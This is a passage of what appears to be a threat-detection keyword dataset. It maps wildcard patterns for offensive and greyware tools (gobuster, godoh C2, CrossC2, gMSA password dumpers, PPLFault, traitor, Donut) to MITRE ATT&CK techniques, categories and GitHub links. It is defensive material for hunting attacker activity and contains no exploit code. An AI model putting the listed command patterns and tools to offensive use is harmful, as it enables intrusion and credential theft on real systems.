-*gitleaks*,offensive_tool_keyword,Gitleaks,Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. in your code.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/zricethezav/gitleaks,1,1,N/A,N/A,10,13893,1249,2023-10-03T15:38:08Z,2018-01-27T18:19:31Z
-*Git-Scanner*,offensive_tool_keyword,Git-Scanner,A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public,T1213 - T1596 - T1190 - T1590,TA0007 - TA0009 - TA0001,N/A,N/A,Information Gathering,https://github.com/HightechSec/git-scanner,1,1,N/A,N/A,4,303,82,2020-06-23T05:44:26Z,2020-05-17T14:30:19Z
-*GIUDA* -askluids*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,0,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z
-*GIUDA-main.zip*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,1,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z
-*give_dcsync.py*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z
-*gjknjjomckknofjidppipffbpoekiipm*,greyware_tool_keyword,VPN Free,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*gkojfkhlekighikafcpjkiklfbnlmeio*,greyware_tool_keyword,Hola Free VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*glassfish_war_upload_xsrf*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*glebarez/padre*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,1,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z
-*glit org -*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*glit repo *,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*glit user *,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*glit.exe org*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*glit.exe repo*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*glit.exe user*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*glit-i686-pc-windows-msvc*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*glit-main.zip*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*glit-x86_64-apple-darwin*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*glit-x86_64-pc-windows-msvc*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*glit-x86_64-unknown-linux-gnu*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z
-*global.rel.tunnels.api.visualstudio.com*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,1,N/A,8,10,N/A,N/A,N/A,N/A
-*global.rel.tunnels.api.visualstudio.com*,greyware_tool_keyword,vscode,built-in port forwarding. This feature allows you to share locally running services over the internet to other people and devices.,T1090 - T1003 - T1571,TA0010 - TA0002 - TA0009,N/A,N/A,C2,https://twitter.com/code/status/1699869087071899669,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*global.rel.tunnels.api.visualstudio.com*,greyware_tool_keyword,vscode,Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets,T1090.003 - T1059.001 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://badoption.eu/blog/2023/01/31/code_c2.html,1,1,risk of False positive,10,10,N/A,N/A,N/A,N/A
-*gloxec/CrossC2*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z
-*gloxec/CrossC2*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z
-*GmailC2.csproj*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,1,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z
-*gmsa_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*gMSADumper.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*gMSADumper.py*,offensive_tool_keyword,gMSADumper,Lists who can read any gMSA password blobs and parses them if the current user has access.,T1552.001 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/micahvandeusen/gMSADumper,1,1,N/A,N/A,2,190,34,2023-08-23T13:32:49Z,2021-04-10T00:15:24Z
-*GMSAPasswordReader.exe*,offensive_tool_keyword,GMSAPasswordReader,Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/rvazarkar/GMSAPasswordReader,1,1,N/A,7,2,103,23,2023-02-17T14:37:40Z,2020-01-19T19:06:20Z
-*GMSAPasswordReader-master*,offensive_tool_keyword,GMSAPasswordReader,Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/rvazarkar/GMSAPasswordReader,1,1,N/A,7,2,103,23,2023-02-17T14:37:40Z,2020-01-19T19:06:20Z
-*GMShellcode*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z
-*GMShellcode.*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z
-*GMShellcode\*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z
-*go build Ivy.go*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z
-*go get -u *traitor/cmd/traitor*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z
-*go run poc.go check -t http://*:8080 -u Admin*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/trganda/CVE-2022-23131,1,0,N/A,N/A,1,1,1,2022-02-24T11:50:28Z,2022-02-24T08:10:46Z
-*go run scannerPort.go*,offensive_tool_keyword,GONET-Scanner,port scanner and arp discover in go,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/GONET-Scanner,1,0,N/A,N/A,1,72,18,2022-03-10T04:35:58Z,2022-02-02T19:39:09Z
-*go_shellcode_encode.py*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,1,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z
-*gobfuscate*,offensive_tool_keyword,gobfuscate,When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.,T1027 - T1029 - T1059,TA0002 - TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/unixpickle/gobfuscate,1,0,N/A,N/A,10,1362,190,2021-12-07T22:27:26Z,2016-10-01T20:40:37Z
-*gobuster dir *,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z
-*gobuster dir -w *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*gobuster dns*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z
-*gobuster fuzz -*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost 
busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster gcs *,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster s3 *,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster tftp *,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster vhost -u *,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster vhost*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster*,offensive_tool_keyword,gobuster,Gobuster is a tool used to brute-force,T1110 - T1114 - T1115 - 
T1107,TA0001 - TA0007,N/A,N/A,Exploitation tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster_*.tar.gz*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster_*.zip*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobusterfuzz*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobustertftp*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gocrack@password.crackers.local*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential 
Access,https://github.com/mandiant/gocrack,1,1,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,1,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*GodFault.exe*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*GodFault\GodFault*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*godoh -*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh agent*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh c2*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh help*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh receive*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh send*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh test*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh-darwin64*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh-linux64*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh-windows32.*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh-windows64.*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*go-donut/*.exe*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*go-donut/*.go*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*GodPotato -*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
